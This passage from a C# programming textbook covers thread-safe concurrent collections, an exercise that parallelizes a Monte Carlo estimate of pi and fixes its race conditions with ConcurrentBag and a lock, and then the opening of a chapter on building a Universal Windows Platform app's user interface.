SemaphoreSlim semaphoreSlim = new SemaphoreSlim(3);
...
// Wait on the semaphore, and catch the OperationCanceledException if
// another thread calls Cancel on cancellationTokenSource
try
{
    semaphoreSlim.Wait(cancellationToken);
}
catch (OperationCanceledException e)
{
    ...
}
The concurrent collection classes
A common requirement of many multithreaded applications is to store and
retrieve data in a collection. The standard collection classes provided with the
.NET Framework are not thread-safe by default, although you can use the
synchronization primitives described in the previous section to wrap code
that adds, queries, and removes elements in a collection. However, this
process is potentially prone to error and not very scalable, so the .NET
Framework class library includes a small set of thread-safe collection classes
and interfaces in the System.Collections.Concurrent namespace that is
designed specifically for use with tasks. The following list briefly
summarizes the key types in this namespace:
ConcurrentBag<T> This is a general-purpose class for holding an
unordered collection of items. It includes methods to insert (Add),
remove (TryTake), and examine (TryPeek) items in the collection.
These methods are thread safe. The collection is also enumerable, so
you can iterate over its contents by using a foreach statement.
ConcurrentDictionary<TKey, TValue> This class implements a
thread-safe version of the generic Dictionary<TKey, TValue>
collection class described in Chapter 18, “Using collections.” It
provides the methods TryAdd, ContainsKey, TryGetValue,
TryRemove, and TryUpdate, which you can use to add, query, remove,
and modify items in the dictionary.
ConcurrentQueue<T> This class provides a thread-safe version of the
generic Queue<T> class described in Chapter 18. It includes the
methods Enqueue, TryDequeue, and TryPeek, which you can use to
add, remove, and query items in the queue.
ConcurrentStack<T> This is a thread-safe implementation of the
generic Stack<T> class, also described in Chapter 18. It provides
methods such as Push, TryPop, and TryPeek, which you can use to
push, pop, and query items on the stack.
Note Adding thread safety to the methods in a collection class imposes
additional run-time overhead, so these classes are not as fast as the
regular collection classes. You need to keep this fact in mind when
deciding whether to parallelize a set of operations that require access to
a shared collection.
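As a brief sketch of the general usage pattern (the Try prefix indicates that
an operation returns false rather than blocking or throwing an exception if it
cannot complete):

ConcurrentQueue<string> queue = new ConcurrentQueue<string>();
queue.Enqueue("first");
if (queue.TryDequeue(out string item))
{
    // item now holds "first", and TryDequeue returned true
}

ConcurrentDictionary<string, int> counts = new ConcurrentDictionary<string, int>();
counts.TryAdd("widgets", 1);
counts.TryUpdate("widgets", 2, 1); // succeeds only if the current value is 1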
Using a concurrent collection and a lock to implement
thread-safe data access
In the following set of exercises, you will implement an application that
calculates pi by using a geometric approximation. Initially, you will perform
the calculation in a single-threaded manner, and then you will change the
code to perform the calculation by using parallel tasks. In the process, you
will uncover some data synchronization issues that you need to address and
that you will solve by using a concurrent collection class and a lock to ensure
that the tasks coordinate their activities correctly.
The algorithm that you will implement calculates pi based on some simple
mathematics and statistical sampling. If you draw a circle of radius r and
draw a square with sides that touch the circle, the sides of the square are 2 * r
in length, as shown in the following image:
You can calculate the area of the square, S, like this
S = (2 * r) * (2 * r)
or
S = 4 * r * r
The area of the circle, C, is calculated as follows:
C = pi * r * r
Rearranging these formulas, you can see that
r * r = C / pi
and
r * r = S / 4
Combining these equations, you get:
S / 4 = C / pi
And therefore:
pi = 4 * C / S
The trick is to determine the value of the ratio of the area of the circle, C,
with respect to the area of the square, S. This is where the statistical sampling
comes in. You can generate a set of random points that lie within the square
and count how many of these points also fall within the circle. If you generate
a sufficiently large and random sample, the ratio of points that lie within the
circle to the points that lie within the square (and also in the circle)
approximates the ratio of the areas of the two shapes, C / S. All you have to
do is count them.
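For example, if 7,853,982 of 10,000,000 random points fall within the circle,
the approximation is pi ≈ 4 * 7,853,982 / 10,000,000 = 3.1415928.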
How do you determine whether a point lies within the circle? To help
visualize the solution, draw the square on a piece of graph paper with the
center of the square at the origin, point (0,0). You can then generate pairs of
values, or coordinates, that lie within the range (–r, –r) to (+r, +r). You can
determine whether any set of coordinates (x, y) lie within the circle by
applying Pythagoras’ theorem to determine the distance d of these
coordinates from the origin. You can calculate d as the square root of ((x * x)
+ (y * y)). If d is less than or equal to r, the radius of the circle, the
coordinates (x, y) specify a point within the circle, as shown in the following
diagram:
You can simplify matters further by generating coordinates that lie only in
the upper-right quadrant of the graph so that you only have to generate pairs
of random numbers between 0 and r. This is the approach you will take in the
exercises.
Note The exercises in this chapter are intended to be run on a computer
with a multicore processor. If you have only a single-core CPU, you
will not observe the same effects. Also, you should not start any
additional programs or services between exercises, because these might
affect the results you see.
Calculate pi by using a single thread
1. Start Visual Studio 2017 if it is not already running.
2. Open the CalculatePI solution, which is located in the \Microsoft
Press\VCSBS\Chapter 24\CalculatePI folder in your Documents folder.
3. In Solution Explorer, in the CalculatePI project, double-click Program.cs
to display the file in the Code and Text Editor window.
This is a console application. The skeleton structure of the application
has already been created for you.
4. Scroll to the bottom of the file and examine the Main method. It looks
like this:
static void Main(string[] args)
{
    double pi = SerialPI();
    Console.WriteLine($"Geometric approximation of PI calculated serially: {pi}");
    Console.WriteLine();

    // pi = ParallelPI();
    // Console.WriteLine($"Geometric approximation of PI calculated in parallel: {pi}");
}
This code calls the SerialPI method, which calculates pi by using the
geometric algorithm described before this exercise. The value is returned
as a double and displayed. The code that is currently commented out
calls the ParallelPI method, which performs the same calculation but by
using concurrent tasks. The result displayed should be the same as that
returned by the SerialPI method.
5. Examine the SerialPI method.
static double SerialPI()
{
    List<double> pointsList = new List<double>();
    Random random = new Random(SEED);
    int numPointsInCircle = 0;
    Stopwatch timer = new Stopwatch();
    timer.Start();
    try
    {
        // TO DO: Implement the geometric approximation of PI
        return 0;
    }
    finally
    {
        long milliseconds = timer.ElapsedMilliseconds;
        Console.WriteLine($"SerialPI complete: Duration: {milliseconds} ms");
        Console.WriteLine(
            $"Points in pointsList: {pointsList.Count}. Points within circle: {numPointsInCircle}");
    }
}
This method generates a large set of coordinates and calculates the
distances of each set of coordinates from the origin. The size of the set is
specified by the constant NUMPOINTS at the top of the Program class.
The bigger this value is, the greater the set of coordinates and the more
accurate the value of pi calculated by this method. If your computer has
sufficient memory, you can increase the value of NUMPOINTS.
Similarly, if you find that the application throws
OutOfMemoryException exceptions when you run it, you can reduce this
value.
You store the distance of each point from the origin in the pointsList
List<double> collection. The data for the coordinates is generated by
using the random variable. This is a Random object, seeded with a
constant to generate the same set of random numbers each time you run
the program. (This helps you determine that it is running correctly.) You
can change the SEED constant at the top of the Program class if you
want to seed the random number generator with a different value.
You use the numPointsInCircle variable to count the number of points in
the pointsList collection that lie within the bounds of the circle. The
radius of the circle is specified by the RADIUS constant at the top of the
Program class.
To help you compare performance between this method and the
ParallelPI method, the code creates a Stopwatch variable called timer
and starts it running. The finally block determines how long the
calculation took and displays the result. For reasons that will be
described later, the finally block also displays the number of items in the
pointsList collection and the number of points that it found that lie
within the circle.
You will add the code that actually performs the calculation to the try
block in the next few steps.
6. In the try block, delete the comment and remove the return statement.
(This statement was provided only to ensure that the code compiles.)
Add to the try block the for block and statements shown in bold in the
following code:
try
{
    for (int points = 0; points < NUMPOINTS; points++)
    {
        int xCoord = random.Next(RADIUS);
        int yCoord = random.Next(RADIUS);
        double distanceFromOrigin = Math.Sqrt(xCoord * xCoord + yCoord * yCoord);
        pointsList.Add(distanceFromOrigin);
        doAdditionalProcessing();
    }
}
This block of code generates a pair of coordinate values that lie in the
range 0 to RADIUS, and it stores them in the xCoord and yCoord
variables. The code then employs Pythagoras’s theorem to calculate the
distance of these coordinates from the origin and adds the result to the
pointsList collection.
Note Although there is a little bit of computational work
performed by this block of code, in a real-world scientific
application you are likely to include far more complex calculations
that will keep the processor occupied for longer. To simulate this
situation, this block of code calls another method,
doAdditionalProcessing. All this method does is occupy a number
of CPU cycles as shown in the following code sample. I opted to
follow this approach to better demonstrate the data synchronization
requirements of multiple tasks rather than have you write an
application that performs a highly complex calculation such as a
fast Fourier transform (FFT) to keep the CPU busy:
private static void doAdditionalProcessing()
{
    Thread.SpinWait(SPINWAITS);
}
SPINWAITS is another constant defined at the top of the
Program class.
7. In the SerialPI method, in the try block, after the for block, add the
foreach statement shown in bold in the following example.
try
{
    for (int points = 0; points < NUMPOINTS; points++)
    {
        ...
    }

    foreach (double datum in pointsList)
    {
        if (datum <= RADIUS)
        {
            numPointsInCircle++;
        }
    }
}
This code iterates through the pointsList collection and examines each
value in turn. If the value is less than or equal to the radius of the circle,
it increments the numPointsInCircle variable. At the end of this loop,
numPointsInCircle should contain the total number of coordinates that
were found to lie within the bounds of the circle.
8. After the foreach statement, add to the try block the following
statements shown in bold:
try
{
    for (int points = 0; points < NUMPOINTS; points++)
    {
        ...
    }

    foreach (double datum in pointsList)
    {
        ...
    }

    double pi = 4.0 * numPointsInCircle / NUMPOINTS;
    return pi;
}
The first statement calculates pi based on the ratio of the number of
points that lie within the circle to the total number of points, using the
formula described earlier. The value is returned as the result of the
method.
9. On the Debug menu, click Start Without Debugging.
The program runs and displays its approximation of PI, as shown in the
following image. (It took nearly 40 seconds on my computer, so be
prepared to wait for a little while.) The time taken to calculate the result
also appears.
Note Apart from the timing, your result should be the same as that
shown, 3.1414888, unless you have changed the NUMPOINTS,
RADIUS, or SEED constants.
10. Close the console window, and return to Visual Studio.
In the SerialPI method, the code in the for loop that generates the points
and calculates their distance from the origin is an obvious area that can be
parallelized. This is what you will do in the next exercise.
Calculate pi by using parallel tasks
1. In Solution Explorer, double-click Program.cs to display the file in the
Code and Text Editor window if it is not already open.
2. Locate the ParallelPI method. It contains the same code as the initial
version of the SerialPI method before you added the code to the try
block to calculate pi.
3. In the try block, delete the comment and remove the return statement.
Add the Parallel.For statement shown here in bold to the try block:
try
{
    Parallel.For(0, NUMPOINTS, (x) =>
    {
        int xCoord = random.Next(RADIUS);
        int yCoord = random.Next(RADIUS);
        double distanceFromOrigin = Math.Sqrt(xCoord * xCoord + yCoord * yCoord);
        pointsList.Add(distanceFromOrigin);
        doAdditionalProcessing();
    });
}
This construct is the parallel analog of the code in the for loop in the
SerialPI method. The body of the original for loop is wrapped in a
lambda expression. Remember that each iteration of the loop is
performed by using a task, and tasks can run in parallel. The degree of
parallelism depends on the number of processor cores and other
resources available on your computer.
4. Add the following code shown in bold to the try block, after the
Parallel.For statement. This code is the same as the corresponding
statements in the SerialPI method.
try
{
    Parallel.For(...
    {
        ...
    });

    foreach (double datum in pointsList)
    {
        if (datum <= RADIUS)
        {
            numPointsInCircle++;
        }
    }

    double pi = 4.0 * numPointsInCircle / NUMPOINTS;
    return pi;
}
5. In the Main method near the end of the Program.cs file, uncomment the
code that calls the ParallelPI method and the Console.WriteLine
statement that displays the results.
6. On the Debug menu, click Start Without Debugging.
The program runs. The following image shows the typical output (your
timings might be different; I was using a quad-core processor):
The value calculated by the SerialPI method should be exactly as
before, but the result of the ParallelPI method, 3.9638868, actually
looks a little suspect. The random number generator is seeded with the
same value as that used by the SerialPI method, so it should produce the
same sequence of random numbers with the same result and the same
number of points within the circle. Moreover, if you run the application
again you should get the same value of PI for the SerialPI method, but
the value calculated by the ParallelPI method is likely to be different
(and still inaccurate). Another curious point is that the pointsList
collection in the ParallelPI method seems to contain fewer points than
the same collection in the SerialPI method.
Note If the pointsList collection actually contains the expected
number of items, run the application again. You should find that it
contains fewer items than expected in most (but not necessarily all)
runs.
7. Close the console window, and return to Visual Studio.
What went wrong with the parallel calculation? A good place to start is
the number of items in the pointsList collection. This collection is a generic
List<double> object. However, this type is not thread-safe. The code in the
Parallel.For statement calls the Add method to append a value to the
collection, but remember that this code is being executed by tasks running as
concurrent threads. Consequently, given the number of items being added to
the collection, it is highly probable that some of the calls to Add will interfere
with one another and cause some corruption. A solution is to use one of the
collections from the System.Collections.Concurrent namespace because these
collections are thread safe. The generic ConcurrentBag<T> class in this
namespace is probably the most suitable collection to use for this example.
Use a thread-safe collection
1. In Solution Explorer, double-click Program.cs to display the file in the
Code and Text Editor window if it is not already open.
2. Add the following using directive to the list at the top of the file:
using System.Collections.Concurrent;
3. Locate the ParallelPI method. At the start of this method, replace the
statement that instantiates the List<double> collection with code that
creates a ConcurrentBag<double> collection instead, as shown in bold
in the following code example:
static double ParallelPI()
{
    ConcurrentBag<double> pointsList = new ConcurrentBag<double>();
    Random random = ...;
    ...
}
Notice that you cannot specify a default capacity for this class, so the
constructor does not take a parameter.
You do not need to change any other code in this method; you add an
item to a ConcurrentBag<T> collection by using the Add method,
which is the same mechanism that you use to add an item to a List<T>
collection.
4. On the Debug menu, click Start Without Debugging.
The program runs and displays its approximation of PI by using the
SerialPI and ParallelPI methods. The following image shows the
typical output.
This time, the pointsList collection in the ParallelPI method contains the
correct number of points, but the number of points within the circle,
9989364, appears to be very high; it should be the same as that reported
by the SerialPI method.
You should also note that the time taken by the ParallelPI method has
increased compared with the previous exercise. This is because the
methods in the ConcurrentBag<T> class have to lock and unlock data to
guarantee thread safety, and this process adds to the overhead of calling
these methods. Keep this point in mind when you’re considering
whether it is appropriate to parallelize an operation.
5. Close the console window, and return to Visual Studio.
You currently have the correct number of points in the pointsList
collection, but the value recorded for each of these points is now
questionable. The code in the Parallel.For construct calls the Next method of
a Random object, but like the methods in the generic List<T> class, this
method is not thread-safe. Sadly, there is no concurrent version of the
Random class, so you must resort to using an alternative technique to
serialize calls to the Next method. Because each invocation is relatively brief,
it makes sense to use a simple lock to guard calls to this method.
Use a lock to serialize method calls
1. In Solution Explorer, double-click Program.cs to display the file in the
Code and Text Editor window if it is not already open.
2. Locate the ParallelPI method. Modify the code in the lambda
expression in the Parallel.For statement to protect the calls to
random.Next by using a lock statement. Specify the pointsList collection
as the subject of the lock, as shown here in bold:
static double ParallelPI()
{
    ...
    Parallel.For(0, NUMPOINTS, (x) =>
    {
        int xCoord;
        int yCoord;
        lock (pointsList)
        {
            xCoord = random.Next(RADIUS);
            yCoord = random.Next(RADIUS);
        }
        double distanceFromOrigin = Math.Sqrt(xCoord * xCoord + yCoord * yCoord);
        pointsList.Add(distanceFromOrigin);
        doAdditionalProcessing();
    });
    ...
}
Notice that the xCoord and yCoord variables are declared outside the
lock statement. You do this because the lock statement defines its own
scope, and any variables defined within the block specifying the scope
of the lock statement disappear when the construct exits.
3. On the Debug menu, click Start Without Debugging.
This time, the values of pi calculated by the SerialPI and ParallelPI
methods are the same. The only difference is that the ParallelPI method
runs much more quickly.
4. Close the console window, and return to Visual Studio.
Summary
In this chapter, you saw how to define asynchronous methods by using the
async modifier and the await operator. Asynchronous methods are based on
tasks, and the await operator specifies the points at which a task can be used
to perform asynchronous processing.
You also learned a little about PLINQ and how you can use the AsParallel
extension method to parallelize some LINQ queries. However, PLINQ is a
big subject in its own right, and this chapter has only shown you how to get
started. For more information, see the topic “Parallel LINQ (PLINQ)” in the
documentation provided with Visual Studio.
This chapter also showed you how to synchronize data access in
concurrent tasks by using the synchronization primitives provided for use
with tasks. You saw how to use the concurrent collection classes to maintain
collections of data in a thread-safe manner.
If you want to continue to the next chapter, keep Visual Studio 2017
running and turn to Chapter 25, “Implementing the user interface for a
Universal Windows Platform app.”
If you want to exit Visual Studio 2017 now, on the File menu, click
Exit. If you see a Save dialog box, click Yes and save the project.
Quick reference

To: Implement an asynchronous method
Do this: Define the method with the async modifier and change the type of the
method to return a Task (or void). In the body of the method, use the await
operator to specify points at which asynchronous processing can be performed.
For example:

private async Task<int> calculateValueAsync(...)
{
    // Invoke calculateValue using a Task
    Task<int> generateResultTask = Task.Run(() => calculateValue(...));
    await generateResultTask;
    return generateResultTask.Result;
}

To: Parallelize a LINQ query
Do this: Specify the AsParallel extension method with the data source in the
query. For example:

var over100 = from n in numbers.AsParallel()
              where ...
              select n;

To: Enable cancellation in a PLINQ query
Do this: Use the WithCancellation method of the ParallelQuery class in the
PLINQ query and specify a cancellation token. For example:

CancellationToken tok = ...;
...
var orderInfoQuery =
    from c in CustomersInMemory.Customers.AsParallel().WithCancellation(tok)
    join o in OrdersInMemory.Orders.AsParallel()
    on ...

To: Synchronize one or more tasks to implement thread-safe exclusive access to
shared data
Do this: Use the lock statement to guarantee exclusive access to the data. For
example:

object myLockObject = new object();
...
lock (myLockObject)
{
    // Code that requires exclusive access to a shared resource
    ...
}

To: Synchronize threads and make them wait for an event
Do this: Use a ManualResetEventSlim object to synchronize an indeterminate
number of threads. Use a CountdownEvent object to wait for an event to be
signaled a specified number of times. Use a Barrier object to coordinate a
specified number of threads and synchronize them at a particular point in an
operation.

To: Synchronize access to a shared pool of resources
Do this: Use a SemaphoreSlim object. Specify the number of items in the pool
in the constructor. Call the Wait method prior to accessing a resource in the
shared pool. Call the Release method when you have finished with the resource.
For example:

SemaphoreSlim semaphore = new SemaphoreSlim(3);
...
semaphore.Wait();
// Access a resource from the pool
...
semaphore.Release();

To: Provide exclusive write access to a resource but shared read access
Do this: Use a ReaderWriterLockSlim object. Prior to reading the shared
resource, call the EnterReadLock method. Call the ExitReadLock method when you
have finished. Before writing to the shared resource, call the EnterWriteLock
method. Call the ExitWriteLock method when you have completed the write
operation. For example:

ReaderWriterLockSlim readerWriterLock = new ReaderWriterLockSlim();
Task readerTask = Task.Factory.StartNew(() =>
{
    readerWriterLock.EnterReadLock();
    // Read shared resource
    readerWriterLock.ExitReadLock();
});
Task writerTask = Task.Factory.StartNew(() =>
{
    readerWriterLock.EnterWriteLock();
    // Write to shared resource
    readerWriterLock.ExitWriteLock();
});

To: Cancel a blocking wait operation
Do this: Create a cancellation token from a CancellationTokenSource object,
and specify this token as a parameter to the wait operation. To cancel the
wait operation, call the Cancel method of the CancellationTokenSource object.
For example:

CancellationTokenSource cancellationTokenSource = new CancellationTokenSource();
CancellationToken cancellationToken = cancellationTokenSource.Token;
...
// Semaphore that protects a pool of 3 resources
SemaphoreSlim semaphoreSlim = new SemaphoreSlim(3);
...
// Wait on the semaphore, and throw an OperationCanceledException if
// another thread calls Cancel on cancellationTokenSource
semaphoreSlim.Wait(cancellationToken);
Download from finelybook [email protected]
884
CHAPTER 25
Implementing the user interface for
a Universal Windows Platform app
After completing this chapter, you will be able to:
Describe the features of a typical Universal Windows Platform app.
Implement a scalable user interface for a Universal Windows Platform
app that can adapt to different form factors and device orientations.
Create and apply styles to a Universal Windows Platform app.
Recent versions of Windows have introduced a platform for building and
running highly interactive applications with continuously connected, touch-
driven user interfaces and support for embedded device sensors. An updated
application security and life-cycle model changed the way that users and
applications work together. This platform is called the Windows Runtime
(WinRT), and I have referred to it occasionally throughout this book. You
can use Visual Studio to build WinRT applications that can adapt themselves
to a variety of device form factors, ranging from handheld tablets to desktop
PCs with large, high-resolution screens. Using Windows 8 and Visual Studio
2013, you could also publish these applications in the Windows Store as
Windows Store apps.
Separately, you could use the Windows Phone SDK 8.0 (integrated into
Visual Studio) to design and implement applications that run on Windows
Phone 8 devices. These applications share many similarities with their tablet
and desktop-oriented siblings, but they operate in a more restricted
environment, typically with fewer resources and a requirement to support a
different user interface layout. Consequently, Windows Phone 8 applications
use a different version of the WinRT, called the Windows Phone Runtime,
and you can market Windows Phone 8 applications as Windows Phone Store
apps. You could create a class library with which to share application and
business logic between a Windows tablet/desktop application and a Windows
Phone 8 application by using the Portable Class Library template in Visual
Studio, but Windows Store apps and Windows Phone Store apps are distinct
beasts with differences in the features that they can make available.
Subsequently, Microsoft sought to converge these platforms and reduce
the number of differences. This strategy has culminated in Windows 10 with
Universal Windows Platform apps. A Universal Windows Platform app uses
an amended version of WinRT called the Universal Windows Platform
(UWP). Using the UWP, you can build applications that will run on the
widest range of Windows 10 devices without the need to maintain separate
code bases. In addition to many phones, tablets, and desktop computers,
UWP is also available on Xbox.
Note The UWP defines a core set of features and functionality. The
UWP divides devices into device families: the desktop device family,
the mobile device family, the Xbox device family, and so on. Each
device family defines the set of APIs and devices on which those APIs
are implemented. Additionally, the Universal device family defines a
core set of features and functionality that is available across all device
families. The libraries available for each device family include
conditional methods that enable an app to test on which device family it
is currently running.
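For example, a minimal sketch (illustrative, not code that this chapter's
exercises use) that reads the device family and probes for an optional API
before calling it:

using Windows.Foundation.Metadata;
using Windows.System.Profile;

// Returns "Windows.Desktop", "Windows.Mobile", "Windows.Xbox", and so on
string deviceFamily = AnalyticsInfo.VersionInfo.DeviceFamily;

// Probe for an optional API before calling it
if (ApiInformation.IsTypePresent("Windows.Phone.UI.Input.HardwareButtons"))
{
    // Safe to use the hardware Back button on this device family
}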
The purpose of this chapter is to provide a brief description of the
concepts that underpin the UWP and to help you get started using Visual
Studio 2017 to build apps that operate in this environment. In this chapter,
you will learn about some of the features and tools included with Visual
Studio 2017 for building UWP apps, and you will construct an app that
conforms to the Windows 10 look and feel. You will concentrate on learning
how to implement a user interface (UI) that scales and adapts to different
device resolutions and form factors, and how to apply styling to give the app
a distinctive look and feel. Subsequent chapters will focus on the
functionality and other features of the app.
Note There is not enough space in a book such as this to provide a
comprehensive treatise on building UWP apps. Rather, these final
chapters concentrate on the basic principles of building an interactive
app that uses the Windows 10 UI. For detailed information on writing
UWP apps, visit the “Guide to Universal Windows Platform (UWP)
apps” page on the Microsoft website at
https://msdn.microsoft.com/library/dn894631.aspx.
Features of a Universal Windows Platform app
Many modern handheld and tablet devices make it possible for users to
interact with apps by using touch. You should design your UWP apps based
on this style of user experience (UX). Windows 10 includes an extensive
collection of touch-based controls that also work with a mouse and keyboard.
You don’t need to separate the touch and mouse features in your apps; simply
design your apps for touch, and users can still operate them by using the
mouse and keyboard if they prefer or when they are using a device that does
not support touch interaction.
The way in which the graphical user interface (GUI) responds to gestures
to provide feedback to the user can greatly enhance the professional feel of
your apps. The UWP app templates included with Visual Studio 2017 include
an animation library that you can use in your apps to standardize this
feedback and blend in seamlessly with the operating system and software that
Microsoft provides.
Note The term gesture refers to the manual touch-oriented operations
that a user can perform. For example, a user can tap an item with a
finger, and this gesture typically responds in the same way that you
would expect a mouse click to behave. However, gestures can be far
more expressive than the simple operations that can be captured by
using a mouse. For example, the rotate gesture involves the user placing
two fingers on the screen and tracing the arc of a circle with them; in a
typical Windows 10 app, this gesture should cause the UI to rotate the
selected object in the direction indicated by the movement of the user’s
fingers. Other gestures include pinching to zoom in on an item to
display more detail, pressing and holding to reveal more information
about an item (similar to right-clicking with the mouse), and sliding to
select an item and drag it across the screen.
The UWP is intended to run on a wide range of devices with varying
screen sizes and resolutions. Therefore, when you implement a UWP app,
you need to construct your software so that it adapts to the environment in
which it is running, scaling automatically to the screen size and orientation of
the device. This approach opens your software to an increasingly broad
market. Additionally, many modern devices can also detect their orientation
and the speed at which the user changes this orientation through the use of
built-in sensors and accelerometers. UWP apps can adapt their layout as the
user tilts or rotates a device, making it possible for the user to work in a mode
that is most comfortable for that individual. You should also understand that
mobility is a key requirement for many modern apps, and with UWP apps,
users can roam and their data can migrate through the cloud to whatever
device they happen to be running your app on at a particular moment.
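Picking up the point about orientation sensors, the DisplayInformation class
exposes the current orientation and raises an event when it changes. This is a
sketch only; the Customers app later in this chapter adapts its layout through
XAML rather than code:

using Windows.Graphics.Display;

DisplayInformation display = DisplayInformation.GetForCurrentView();

// Landscape, Portrait, LandscapeFlipped, or PortraitFlipped
DisplayOrientations current = display.CurrentOrientation;

// Raised when the user rotates the device
display.OrientationChanged += (sender, args) =>
{
    // Adjust the layout to suit sender.CurrentOrientation
};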
The lifetime of a UWP app is somewhat different from that of a traditional
desktop app. You should design apps that can run on devices such as
smartphones to suspend execution when the user switches focus to another
app and then to resume running when the focus returns. This approach can
help to conserve resources and battery life on a constrained device. Windows
might actually decide to close a suspended app if it determines that it needs to
release system resources such as memory. When the app next runs, it should
be able to resume where it left off. This means that you need to be prepared
to manage app state information in your code, save it to hard disk, and restore
it at the appropriate juncture.
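For example, a minimal sketch that saves a value when the app is suspended and
reads it back later (the key name "lastCustomerId" is hypothetical, used here
only for illustration):

using Windows.Storage;

// In the App class constructor:
this.Suspending += (sender, e) =>
{
    // Persist simple state in the app's local settings store;
    // "lastCustomerId" is a hypothetical key used for illustration
    ApplicationData.Current.LocalSettings.Values["lastCustomerId"] = 42;
};

// When the app next starts, read the value back:
object savedId = ApplicationData.Current.LocalSettings.Values["lastCustomerId"];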
Note You can find more information about how to manage the life cycle
of a UWP app at the page “Guidelines for app suspend and resume” on
the Microsoft website at
https://msdn.microsoft.com/library/windows/apps/hh465088.aspx.
When you build a new UWP app, you can package it by using the tools
provided with Visual Studio 2017 and upload it to the Windows Store. Other
users can then connect to the Store, download your app, and install it. You
can charge a fee for your apps, or you can make them available at no cost.
This distribution and deployment mechanism depends on your apps being
trustworthy and conforming to security policies specified by Microsoft.
When you upload an app to the Windows Store, it undergoes a number of
checks to verify that it does not contain malicious code and that it conforms
to the security requirements of a UWP app. These security constraints dictate
how your app accesses resources on the computer on which it is installed. For
example, by default, a UWP app cannot write directly to the file system or
listen for incoming requests from the network (two of the behaviors
commonly exhibited by viruses and other malware). However, if your app
needs to perform restricted operations, you can specify them as capabilities in
the app’s manifest data held in the Package.appxmanifest file. This
information is recorded in the metadata of your app and signals Microsoft to
perform additional tests to verify the way in which your app uses these
features.
The Package.appxmanifest file is an XML document, but you can edit it in
Visual Studio by using the Manifest Designer. The following image shows an
example. Here, the Capabilities tab is being used to specify the restricted
operations that the application can perform.
In this example, the application declares that it needs to:
Receive incoming data from the Internet but cannot act as a server and
has no local network access.
Access GPS information that provides information about the location
of the device.
Read and write files held in the user’s Pictures folder.
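In the underlying XML, these three declarations would look something like the
following sketch (the uap namespace prefix is declared by the project
template):

<Capabilities>
  <!-- Incoming data from the Internet; no server or local network access -->
  <Capability Name="internetClient" />
  <!-- Location (GPS) information -->
  <DeviceCapability Name="location" />
  <!-- Read/write access to the user's Pictures folder -->
  <uap:Capability Name="picturesLibrary" />
</Capabilities>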
The user is made aware of these requirements, and in all cases, the user
can disable the settings after installing the app; the application must detect
when this has occurred and be prepared to fall back to an alternative solution
or disable the functionality that requires these features.
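For instance, a sketch (not part of the Customers app) of how an app that
declares the location capability might detect refusal and fall back:

using System.Threading.Tasks;
using Windows.Devices.Geolocation;

private async Task CheckLocationAccessAsync()
{
    GeolocationAccessStatus status = await Geolocator.RequestAccessAsync();
    if (status != GeolocationAccessStatus.Allowed)
    {
        // The user has denied access to location; fall back to an
        // alternative (a manually entered address, for example) or
        // disable the feature that needs it
    }
}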
Note You can find more information about the capabilities that UWP
apps support on the “App capability declarations” page on the Microsoft
website at
http://msdn.microsoft.com/library/windows/apps/hh464936.aspx.
Enough theory; let’s get started building a UWP app.
Using the Blank App template to build a Universal
Windows Platform app
The simplest way to build a UWP app is to use the UWP app templates
included with Visual Studio 2017 on Windows 10. Many of the GUI-based
applications implemented in earlier chapters have made use of the Blank App
template, and this is a good place to start.
In the following exercises, you will design the user interface for a simple
app for a fictitious company called Adventure Works. This company
manufactures and supplies bicycles and associated paraphernalia. The app
will enable a user to enter and modify the details of Adventure Works’s
customers.
Create the Adventure Works Customers app
1. Start Visual Studio 2017 if it is not already running.
2. On the File menu, point to New, and then click Project.
3. In the New Project dialog box, in the left pane, expand Visual C#, and
then click Windows Universal.
4. In the middle pane, click the Blank App (Universal Windows) icon.
5. In the Name field, type Customers.
6. In the Location field, type \Microsoft Press\VCSBS\Chapter
25 in your Documents folder.
7. Click OK.
8. In the New Universal Windows Project dialog box, accept the default
values for the Target Version and Minimum Version drop-down list
boxes, and then click OK.
The new app is created, and the Overview page is displayed. This page
contains links to information that you can use to start creating,
configuring, and deploying Universal Windows apps.
9. In Solution Explorer, double-click MainPage.xaml.
The Design View window appears and displays a blank page. You can
drag controls from the Toolbox to add the various controls required by
the app, as demonstrated in Chapter 1, “Welcome to C#.” However, for
this exercise, it is more instructive to concentrate on the XAML markup
that defines the layout for the form. If you examine this markup, it
should look like this:
<Page
    x:Class="Customers.MainPage"
    xmlns="http://schemas.microsoft.com/winfx/2006/xaml/presentation"
    xmlns:x="http://schemas.microsoft.com/winfx/2006/xaml"
    xmlns:local="using:Customers"
    xmlns:d="http://schemas.microsoft.com/expression/blend/2008"
    xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006"
    mc:Ignorable="d">

    <Grid Background="{ThemeResource ApplicationPageBackgroundThemeBrush}">

    </Grid>
</Page>
The form starts with the XAML <Page> tag and finishes with a closing
</Page> tag. Everything between these tags defines the content of the
page.
The attributes of the <Page> tag contain a number of declarations of the
form xmlns:id = “…”. These are XAML namespace declarations, and
they operate similarly to C# using directives since they bring items into
scope. Many of the controls and other items that you can add to a page
are defined in these XAML namespaces, and you can ignore most of
these declarations. However, there is one rather curious-looking
declaration to which you should pay attention:
xmlns:local="using:Customers"
This declaration brings the items in the C# Customers namespace into
scope. You can reference classes and other types in this namespace in
your XAML code by prefixing them with local. The Customers
namespace is the namespace generated for the code in your app.
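For example (an illustrative fragment; MyConverter is a hypothetical class in
the Customers namespace):

<Page.Resources>
    <!-- MyConverter is a hypothetical class defined in the Customers namespace -->
    <local:MyConverter x:Key="myConverter" />
</Page.Resources>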
10. In Solution Explorer, expand MainPage.xaml, and then double-click
MainPage.xaml.cs to display it in the Code and Text Editor window.
11. Remember from the exercises earlier in this book that this is the C# file
that contains the app logic and event handlers for the form. It looks like
this (the using directives at the top of the file have been omitted to save
space):
// The Blank Page item template is documented at
// http://go.microsoft.com/fwlink/?LinkId=402352&clcid=0x409

namespace Customers
{
    /// <summary>
    /// An empty page that can be used on its own or navigated to within a Frame.
    /// </summary>
    public sealed partial class MainPage : Page
    {
        public MainPage()
        {
            this.InitializeComponent();
        }
    }
}
This file defines the types in the Customers namespace. The page is
implemented by a class called MainPage, and it inherits from the Page
class. The Page class implements the default functionality of an XAML
page for a UWP app, so all you have to do is write the code that defines
the logic specific to your app in the MainPage class.
12. Return to the MainPage.xaml file in the Design View window. If you
look at the XAML markup for the page, you should notice that the
<Page> tag includes the following attribute:
x:Class="Customers.MainPage"
This attribute connects the XAML markup that defines the layout of the
page to the MainPage class that provides the logic behind the page.
That’s the basic plumbing of a simple UWP app. Of course, what makes a
graphical app valuable is the way in which it presents information to a user.
This is not always as simple as it sounds. Designing an attractive and easy-to-
use graphical interface requires specialist skills that not all developers have (I
know, because I lack them myself). However, many graphic artists who do
